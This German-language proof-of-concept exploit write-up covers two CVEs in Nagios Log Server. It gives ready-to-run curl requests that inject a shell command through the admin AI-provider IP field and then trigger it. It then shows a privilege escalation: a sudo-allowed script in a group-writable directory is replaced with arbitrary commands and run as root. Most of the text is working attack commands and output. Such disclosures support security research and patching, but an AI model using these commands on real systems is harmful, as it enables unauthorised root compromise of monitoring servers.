
Proof-of-Concept-Exploits für CVE-2025-34322 und CVE-2025-34323 in Nagios Log Server
Proof-of-Concept-Exploits für CVE-2025-34322 und CVE-2025-34323 in Nagios Log Server, zusammen mit einem kombinierten Skript, um eine Root-Shell zu erhalten.
Nach der Authentifizierung ersetzen Sie Ihre Session-ID in diesen beiden curl-Befehlen. Der erste setzt den auszuführenden Befehl, der nächste führt den Befehl aus:
$ curl -s -H 'Cookie: csrf_ls=8f053ed2cb80988cea42d3ae3fc4415d; ls_session=<your-session-id>' --data 'csrf_ls=8f053ed2cb80988cea42d3ae3fc4415d&natural_language_query=1&nlp_disclaimer=on&ai_provider=self_hosted&self_host_ip_address=`touch /tmp/rce`&ai_port=8000&saveglobals=1' http://192.168.122.198/nagioslogserver/admin/globals
$ curl -s -H 'Cookie: ls_session=<your-session-id>' http://192.168.122.198/nagioslogserver/dashboard/natural_language_to_query
Der Benutzer www-data hat sudo-Rechte, um das folgende Skript als root auszuführen:
(root) NOPASSWD: /usr/local/nagioslogserver/scripts/get_logstash_ports.sh
(root) NOPASSWD: /usr/local/nagioslogserver/scripts/profile.sh
(root) NOPASSWD: /usr/local/nagioslogserver/scripts/reconfigure_ncpa.sh
und das Verzeichnis /usr/local/nagioslogserver/scripts ist beschreibbar
www-data@debian-nagios-logserver2:/usr/local/nagioslogserver$ ls -lah
total 44K
drwxrwxr-x 11 nagios nagios 4.0K Sep 7 16:34 .
drwxr-xr-x 12 root root 4.0K Sep 7 16:29 ..
drwxrwxr-x 4 nagios nagios 4.0K Sep 7 16:20 etc
-rw-r--r-- 1 root root 0 Sep 7 16:34 .installed
drwxr-xr-x 14 nagios nagios 4.0K Sep 7 16:29 logstash
drwxrwxr-x 2 nagios nagios 4.0K Sep 7 16:20 mibs
drwxr-xr-x 12 nagios nagios 4.0K Sep 7 16:20 opensearch
drwxrwxr-x 5 nagios nagios 4.0K Sep 7 16:20 pythonvenv
drwxrwxr-x 3 nagios nagios 4.0K Sep 7 16:20 scripts
drwxrwxr-x 2 nagios nagios 4.0K Sep 7 16:36 snapshots
drwxrwxr-x 3 nagios www-data 4.0K Sep 7 16:36 tmp
drwxrwxr-x 2 nagios nagios 4.0K Sep 7 16:31 var
da der Benutzer www-data Mitglied der Gruppe nagios ist. Daher kann der Benutzer www-data Dateien innerhalb des Verzeichnisses verschieben, unabhängig vom Besitzer. Die folgenden Befehle verschieben eine Datei (reconfigure_ncpa.sh), die der www-data-Benutzer mit sudo-Rechten ausführen kann, und ersetzen die Datei dann durch eine neue Datei, die beliebige Befehle enthält:
mv /usr/local/nagioslogserver/scripts/reconfigure_ncpa.sh /usr/local/nagioslogserver/scripts/reconfigure_ncpa.sh.bak;
echo '<command>' > /usr/local/nagioslogserver/scripts/reconfigure_ncpa.sh;
chmod +x /usr/local/nagioslogserver/scripts/reconfigure_ncpa.sh;
sleep 1;
sudo /usr/local/nagioslogserver/scripts/reconfigure_ncpa.sh;